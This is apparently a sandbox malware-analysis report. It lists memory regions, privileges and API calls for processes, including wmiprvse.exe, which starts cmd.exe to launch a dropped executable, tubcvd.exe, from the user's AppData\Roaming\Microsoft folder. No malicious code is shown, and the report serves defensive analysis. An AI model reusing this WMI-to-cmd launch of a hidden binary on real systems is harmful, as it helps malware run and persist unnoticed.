  • Region Actions
private_0x0000003f74f00000 0x3f74f00000 0x3f74ffffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f75000000 0x3f75000000 0x3f750fffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f75100000 0x3f75100000 0x3f751fffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f75200000 0x3f75200000 0x3f752fffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f75300000 0x3f75300000 0x3f753fffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f75400000 0x3f75400000 0x3f754fffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f75500000 0x3f75500000 0x3f755fffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f75600000 0x3f75600000 0x3f756fffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f75700000 0x3f75700000 0x3f757fffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f75800000 0x3f75800000 0x3f758fffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f75900000 0x3f75900000 0x3f759fffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f75a00000 0x3f75a00000 0x3f75afffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f75b00000 0x3f75b00000 0x3f75bfffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f75c00000 0x3f75c00000 0x3f75cfffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f75d00000 0x3f75d00000 0x3f75dfffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f75e00000 0x3f75e00000 0x3f75efffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f75f00000 0x3f75f00000 0x3f75ffffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f76000000 0x3f76000000 0x3f760fffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f76100000 0x3f76100000 0x3f761fffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f76200000 0x3f76200000 0x3f762fffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f76300000 0x3f76300000 0x3f763fffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f76400000 0x3f76400000 0x3f764fffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f76500000 0x3f76500000 0x3f765fffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f76600000 0x3f76600000 0x3f766fffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f76700000 0x3f76700000 0x3f767fffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f76800000 0x3f76800000 0x3f768fffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f76900000 0x3f76900000 0x3f769fffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f76a00000 0x3f76a00000 0x3f76afffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f76b00000 0x3f76b00000 0x3f76bfffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f76c00000 0x3f76c00000 0x3f76cfffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f76d00000 0x3f76d00000 0x3f76dfffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f76e00000 0x3f76e00000 0x3f76efffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f76f00000 0x3f76f00000 0x3f76ffffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f77000000 0x3f77000000 0x3f770fffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f77100000 0x3f77100000 0x3f771fffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f77200000 0x3f77200000 0x3f7727ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f77280000 0x3f77280000 0x3f7737ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f77380000 0x3f77380000 0x3f7747ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f77480000 0x3f77480000 0x3f7757ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f77580000 0x3f77580000 0x3f7767ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000003f77680000 0x3f77680000 0x3f7777ffff Private Memory Readable, Writable True False False
  • Region Actions
For performance reasons, the remaining 252 entries are omitted.
The remaining entries can be found in flog.txt.
Process #12: wmiprvse.exe
+
Information Value
ID #12
File Name c:\windows\system32\wbem\wmiprvse.exe
Command Line C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:02:35, Reason: RPC Server
Unmonitor End Time: 00:10:26, Reason: Terminated by Timeout
Monitor Duration 00:07:51
Remarks No high level activity detected in monitored regions
OS Process Information
+
Information Value
PID 0xab0
Parent PID 0x240 (c:\windows\system32\svchost.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\Network Service
Groups
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\SERVICE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • WMI (Network Service) (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, OWNER)
  • NT AUTHORITY\Logon Session 00000000:00031cc7 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID, OWNER)
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 78C
0x 538
0x 780
0x 578
0x 490
0x 2EC
0x 2F8
0x 2E4
0x 2D0
0x 494
0x 48C
0x 6EC
0x 3FC
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False
  • Region Actions
pagefile_0x000000ca2a000000 0xca2a000000 0xca2a00ffff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
private_0x000000ca2a010000 0xca2a010000 0xca2a016fff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x000000ca2a020000 0xca2a020000 0xca2a033fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x000000ca2a040000 0xca2a040000 0xca2a0bffff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x000000ca2a0c0000 0xca2a0c0000 0xca2a0c3fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x000000ca2a0d0000 0xca2a0d0000 0xca2a0d0fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x000000ca2a0e0000 0xca2a0e0000 0xca2a0e1fff Private Memory Readable, Writable True False False
  • Region Actions
locale.nls 0xca2a0f0000 0xca2a1adfff Memory Mapped File Readable False False False
  • Region Actions
private_0x000000ca2a1b0000 0xca2a1b0000 0xca2a22ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000ca2a230000 0xca2a230000 0xca2a236fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000ca2a240000 0xca2a240000 0xca2a240fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000ca2a250000 0xca2a250000 0xca2a250fff Private Memory Readable, Writable True False False
  • Region Actions
user32.dll.mui 0xca2a260000 0xca2a264fff Memory Mapped File Readable False False False
  • Region Actions
pagefile_0x000000ca2a270000 0xca2a270000 0xca2a270fff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
pagefile_0x000000ca2a280000 0xca2a280000 0xca2a280fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x000000ca2a290000 0xca2a290000 0xca2a290fff Pagefile Backed Memory Readable True False False
  • Region Actions
wmi.dll 0xca2a2a0000 0xca2a2a2fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
cimwin32.dll.mui 0xca2a2b0000 0xca2a2b2fff Memory Mapped File Readable False False False
  • Region Actions
pagefile_0x000000ca2a2c0000 0xca2a2c0000 0xca2a2c1fff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
private_0x000000ca2a2e0000 0xca2a2e0000 0xca2a3dffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000ca2a3e0000 0xca2a3e0000 0xca2a45ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000ca2a490000 0xca2a490000 0xca2a49ffff Private Memory Readable, Writable True False False
  • Region Actions
sortdefault.nls 0xca2a4a0000 0xca2a7d6fff Memory Mapped File Readable False False False
  • Region Actions
pagefile_0x000000ca2a7e0000 0xca2a7e0000 0xca2a967fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x000000ca2a970000 0xca2a970000 0xca2aaf0fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x000000ca2ab00000 0xca2ab00000 0xca2abbffff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x000000ca2abc0000 0xca2abc0000 0xca2acbffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000ca2acc0000 0xca2acc0000 0xca2ad3ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000ca2ad40000 0xca2ad40000 0xca2adbffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000ca2adc0000 0xca2adc0000 0xca2ae3ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000ca2ae40000 0xca2ae40000 0xca2aebffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000ca2aec0000 0xca2aec0000 0xca2af3ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000ca2af40000 0xca2af40000 0xca2afbffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000ca2afc0000 0xca2afc0000 0xca2b03ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000ca2b040000 0xca2b040000 0xca2b0bffff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x00007df5ff9d0000 0x7df5ff9d0000 0x7ff5ff9cffff Pagefile Backed Memory - True False False
  • Region Actions
private_0x00007ff7175e6000 0x7ff7175e6000 0x7ff7175e7fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00007ff7175e8000 0x7ff7175e8000 0x7ff7175e9fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00007ff7175ea000 0x7ff7175ea000 0x7ff7175ebfff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00007ff7175ec000 0x7ff7175ec000 0x7ff7175edfff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00007ff7175ee000 0x7ff7175ee000 0x7ff7175effff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x00007ff7175f0000 0x7ff7175f0000 0x7ff7176effff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x00007ff7176f0000 0x7ff7176f0000 0x7ff717712fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x00007ff717713000 0x7ff717713000 0x7ff717714fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00007ff717715000 0x7ff717715000 0x7ff717715fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00007ff717716000 0x7ff717716000 0x7ff717717fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00007ff717718000 0x7ff717718000 0x7ff717719fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00007ff71771a000 0x7ff71771a000 0x7ff71771bfff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00007ff71771c000 0x7ff71771c000 0x7ff71771dfff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00007ff71771e000 0x7ff71771e000 0x7ff71771ffff Private Memory Readable, Writable True False False
  • Region Actions
wmiprvse.exe 0x7ff717b10000 0x7ff717b8efff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
framedynos.dll 0x7ff9dfdd0000 0x7ff9dfe1dfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
cimwin32.dll 0x7ff9dfe20000 0x7ff9dffedfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wmiutils.dll 0x7ff9e0460000 0x7ff9e0484fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wbemsvc.dll 0x7ff9e0490000 0x7ff9e04a3fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
fastprox.dll 0x7ff9e04b0000 0x7ff9e05a7fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
ncobjapi.dll 0x7ff9e0a50000 0x7ff9e0a65fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wbemcomn.dll 0x7ff9e1ff0000 0x7ff9e206efff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wbemprox.dll 0x7ff9e4b30000 0x7ff9e4b40fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wmiclnt.dll 0x7ff9e8160000 0x7ff9e8170fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
rsaenh.dll 0x7ff9ea6c0000 0x7ff9ea6f2fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
userenv.dll 0x7ff9ea7b0000 0x7ff9ea7cefff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
cryptsp.dll 0x7ff9eaa70000 0x7ff9eaa86fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
cryptbase.dll 0x7ff9eabe0000 0x7ff9eabeafff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
sspicli.dll 0x7ff9eadc0000 0x7ff9eadebfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
bcrypt.dll 0x7ff9eafc0000 0x7ff9eafe7fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
bcryptprimitives.dll 0x7ff9eaff0000 0x7ff9eb05afff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
profapi.dll 0x7ff9eb1a0000 0x7ff9eb1b2fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
powrprof.dll 0x7ff9eb1c0000 0x7ff9eb209fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
kernel.appcore.dll 0x7ff9eb210000 0x7ff9eb21efff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
kernelbase.dll 0x7ff9ebc60000 0x7ff9ebe3cfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
msvcrt.dll 0x7ff9ebe40000 0x7ff9ebedcfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
user32.dll 0x7ff9ebee0000 0x7ff9ec02dfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
combase.dll 0x7ff9ec1f0000 0x7ff9ec46bfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
advapi32.dll 0x7ff9ec470000 0x7ff9ec515fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
clbcatq.dll 0x7ff9ec520000 0x7ff9ec5c4fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
oleaut32.dll 0x7ff9eca30000 0x7ff9ecaedfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
ws2_32.dll 0x7ff9ecb00000 0x7ff9ecb68fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
rpcrt4.dll 0x7ff9ee0a0000 0x7ff9ee1c5fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
sechost.dll 0x7ff9ee1f0000 0x7ff9ee24afff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
kernel32.dll 0x7ff9ee250000 0x7ff9ee2fcfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
gdi32.dll 0x7ff9ee4d0000 0x7ff9ee654fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
nsi.dll 0x7ff9ee6c0000 0x7ff9ee6c7fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
ntdll.dll 0x7ff9ee770000 0x7ff9ee931fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
Process #13: cmd.exe
(Host: 52, Network: 0)
+
Information Value
ID #13
File Name c:\windows\system32\cmd.exe
Command Line cmd /c start C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\tubcvd.exe
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:02:35, Reason: Child Process
Unmonitor End Time: 00:10:26, Reason: Terminated by Timeout
Monitor Duration 00:07:51
OS Process Information
+
Information Value
PID 0x2f0
Parent PID 0xab0 (c:\windows\system32\wbem\wmiprvse.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username LHNIWSJ\CIiHmnxMn6Ps
Groups
  • LHNIWSJ\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Local account and member of Administrators group (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, OWNER)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Local account (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0001a1d9 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 470
0x 528
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False
  • Region Actions
private_0x000000c081180000 0xc081180000 0xc08119ffff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x000000c081180000 0xc081180000 0xc08118ffff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
private_0x000000c081190000 0xc081190000 0xc081196fff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x000000c0811a0000 0xc0811a0000 0xc0811b3fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x000000c0811c0000 0xc0811c0000 0xc0812bffff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x000000c0812c0000 0xc0812c0000 0xc0812c3fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x000000c0812d0000 0xc0812d0000 0xc0812d0fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x000000c0812e0000 0xc0812e0000 0xc0812e1fff Private Memory Readable, Writable True False False
  • Region Actions
locale.nls 0xc0812f0000 0xc0813adfff Memory Mapped File Readable False False False
  • Region Actions
private_0x000000c0813b0000 0xc0813b0000 0xc0813b6fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000c081480000 0xc081480000 0xc08157ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000c081580000 0xc081580000 0xc08167ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000c081830000 0xc081830000 0xc08183ffff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x00007df5ff480000 0x7df5ff480000 0x7ff5ff47ffff Pagefile Backed Memory - True False False
  • Region Actions
pagefile_0x00007ff65ad10000 0x7ff65ad10000 0x7ff65ae0ffff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x00007ff65ae10000 0x7ff65ae10000 0x7ff65ae32fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x00007ff65ae3a000 0x7ff65ae3a000 0x7ff65ae3bfff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00007ff65ae3c000 0x7ff65ae3c000 0x7ff65ae3dfff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00007ff65ae3e000 0x7ff65ae3e000 0x7ff65ae3efff Private Memory Readable, Writable True False False
  • Region Actions
cmd.exe 0x7ff65bdd0000 0x7ff65be28fff Memory Mapped File Readable, Writable, Executable True False False
  • Region Actions
kernelbase.dll 0x7ff9ebc60000 0x7ff9ebe3cfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
msvcrt.dll 0x7ff9ebe40000 0x7ff9ebedcfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
kernel32.dll 0x7ff9ee250000 0x7ff9ee2fcfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
ntdll.dll 0x7ff9ee770000 0x7ff9ee931fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
Threads
Thread 0x470
(Host: 47, Network: 0)
+
Category Operation Information Success Count Logfile
Module Get Handle module_name = c:\windows\system32\cmd.exe, base_address = 0x7ff65bdd0000 True 1
Fn
Module Get Handle module_name = c:\windows\system32\kernel32.dll, base_address = 0x7ff9ee250000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x7ff9ee26d550 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System False 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 3
Fn
File Open filename = STD_INPUT_HANDLE True 2
Fn
Environment Get Environment String - True 2
Fn
Data
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 1, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Module Get Filename process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 True 1
Fn
Environment Get Environment String name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Fn
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Environment Get Environment String name = PROMPT False 1
Fn
Environment Set Environment String name = PROMPT, value = $P$G True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Environment Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Environment Get Environment String name = KEYS False 1
Fn
File Get Info filename = C:\Windows\system32, type = file_attributes True 1
Fn
File Get Info filename = C:\Windows\System32, type = file_attributes True 1
Fn
Environment Set Environment String name = =C:, value = C:\Windows\System32 True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Handle module_name = c:\windows\system32\kernel32.dll, base_address = 0x7ff9ee250000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x7ff9ee2725e0 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x7ff9ee271f90 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x7ff9ebcb3a10 True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Process Create process_name = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\tubcvd.exe, os_pid = 0xa5c, creation_flags = CREATE_NEW_CONSOLE, CREATE_UNICODE_ENVIRONMENT, CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Thread Resume process_name = c:\windows\system32\cmd.exe, os_tid = 0x470 True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 2
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
Process #15: tubcvd.exe
(Host: 24310, Network: 33)
+
Information Value
ID #15
File Name c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\tubcvd.exe
Command Line C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\tubcvd.exe
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:02:35, Reason: Child Process
Unmonitor End Time: 00:10:26, Reason: Terminated by Timeout
Monitor Duration 00:07:51
OS Process Information
+
Information Value
PID 0xa5c
Parent PID 0x2f0 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username LHNIWSJ\CIiHmnxMn6Ps
Groups
  • LHNIWSJ\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Local account and member of Administrators group (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, OWNER)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Local account (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0001a1d9 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 89C
0x 2C0
0x 248
0x 134
0x B9C
0x 7AC
0x 1A4
0x 784
0x 1B4
0x 880
0x 57C
0x 7B0
0x 7A0
0x 824
0x 820
0x 75C
0x 814
0x 81C
0x 838
0x 804
0x 610
0x BF0
0x B80
0x 900
0x BEC
0x B5C
0x 7F0
0x AD4
0x AD8
0x 8CC
0x 2CC
0x 2E0
0x 77C
0x 868
0x 7FC
0x 87C
0x 7EC
0x 4B8
0x BD8
0x F0
0x 904
0x 934
0x 8FC
0x 898
0x 780
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000020000 0x00020000 0x00023fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False
  • Region Actions
